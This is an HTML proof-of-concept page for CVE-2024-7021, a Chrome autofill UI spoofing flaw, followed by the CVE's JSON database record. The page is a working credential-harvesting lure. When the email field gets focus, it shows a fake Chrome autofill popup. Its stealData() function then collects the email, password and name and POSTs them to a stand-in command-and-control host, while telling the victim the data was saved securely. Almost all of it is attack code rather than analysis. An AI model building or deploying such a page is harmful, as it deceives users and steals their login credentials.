CVE-2024-7021

<!-- CVE-2024-7021 PoC: Chrome Autofill UI Spoofing --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Login - Chrome Autofill Spoofing PoC</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: Arial, sans-serif; background: #f5f5f5; } /* Fake login form overlay */ .fake-autofill-container { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.7); display: none; justify-content: center; align-items: center; z-index: 999999; } .fake-autofill-box { background: white; border-radius: 8px; padding: 24px; width: 380px; box-shadow: 0 4px 20px rgba(0,0,0,0.3); font-family: 'Segoe UI', Arial, sans-serif; } .fake-autofill-header { display: flex; align-items: center; margin-bottom: 16px; padding-bottom: 12px; border-bottom: 1px solid #e0e0e0; } .fake-chrome-icon { width: 32px; height: 32px; background: linear-gradient(135deg, #4285f4, #34a853); border-radius: 50%; margin-right: 12px; } .fake-autofill-title { font-size: 16px; font-weight: 500; color: #333; } .fake-autofill-item { padding: 12px; border: 1px solid #e0e0e0; border-radius: 6px; margin-bottom: 8px; cursor: pointer; transition: background 0.2s; } .fake-autofill-item:hover { background: #f0f7ff; border-color: #4285f4; } .fake-autofill-item .name { font-size: 14px; font-weight: 500; color: #333; margin-bottom: 4px; } .fake-autofill-item .email { font-size: 12px; color: #666; } .fake-submit-btn { width: 100%; padding: 12px; background: #4285f4; color: white; border: none; border-radius: 6px; font-size: 14px; font-weight: 500; cursor: pointer; margin-top: 16px; } /* Real form that triggers autofill */ .real-form { max-width: 400px; margin: 50px auto; padding: 30px; background: white; border-radius: 10px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); } .real-form h2 { text-align: center; margin-bottom: 20px; color: #333; } .form-group { margin-bottom: 15px; } .form-group label { display: block; margin-bottom: 5px; font-size: 14px; color: #555; } .form-group input { width: 100%; padding: 10px; border: 1px solid #ddd; border-radius: 5px; font-size: 14px; } .exploit-note { background: #fff3cd; border: 1px solid #ffc107; padding: 12px; border-radius: 6px; margin-bottom: 20px; font-size: 12px; color: #856404; } </style> </head> <body> <div class="real-form"> <div class="exploit-note"> <strong>Note:</strong> This is a PoC for CVE-2024-7021 - Chrome Autofill UI Spoofing on Windows. The fake autofill popup will appear when the user focuses on the email field. </div> <h2>Sign In</h2> <form id="loginForm"> <div class="form-group"> <label for="email">Email or Username</label> <input type="email" id="email" name="email" autocomplete="email" placeholder="Enter your email"> </div> <div class="form-group"> <label for="password">Password</label> <input type="password" id="password" name="password" autocomplete="current-password" placeholder="Enter your password"> </div> <div class="form-group"> <label for="name">Full Name</label> <input type="text" id="name" name="name" autocomplete="name" placeholder="Your full name"> </div> </form> </div> <!-- Fake Autofill Popup that overlays the real one --> <div class="fake-autofill-container" id="fakeAutofill"> <div class="fake-autofill-box"> <div class="fake-autofill-header"> <div class="fake-chrome-icon"></div> <span class="fake-autofill-title">Select info to fill in</span> </div> <div class="fake-autofill-item" onclick="stealData()"> <div class="name">John Doe (Saved)</div> <div class="email">[email protected]</div> </div> <div class="fake-autofill-item" onclick="stealData()"> <div class="name">Jane Smith</div> <div class="email">[email protected]</div> </div> <button class="fake-submit-btn" onclick="stealData()">Use selected info</button> </div> </div> <script> // Show fake autofill popup when email field is focused document.getElementById('email').addEventListener('focus', function() { // Simulate delay to mimic real autofill behavior setTimeout(function() { document.getElementById('fakeAutofill').style.display = 'flex'; }, 500); }); // Steal data function - simulates credential harvesting function stealData() { const email = document.getElementById('email').value; const password = document.getElementById('password').value; const name = document.getElementById('name').value; console.log('Stolen credentials:', { email, password, name }); // Send data to attacker server (C2) fetch('https://attacker-c2.example.com/collect', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ cve: 'CVE-2024-7021', timestamp: new Date().toISOString(), data: { email, password, name } }) }).catch(e => console.log('Data exfiltration attempted')); // Hide fake popup document.getElementById('fakeAutofill').style.display = 'none'; alert('Your information has been saved securely.'); } // Close popup when clicking outside document.getElementById('fakeAutofill').addEventListener('click', function(e) { if (e.target === this) { this.style.display = 'none'; } }); </script> </body> </html>

{"cve": {"id": "CVE-2024-7021", "sourceIdentifier": "[email protected]", "published": "2025-11-14T03:15:55.650", "lastModified": "2025-11-17T12:24:30.807", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inappropriate implementation in Autofill in Google Chrome on Windows prior to 124.0.6367.60 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "124.0.6367.60", "matchCriteriaId": "AFB90495-B48B-4020-A2CC-51D77CABEB72"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_16.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/40064701", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}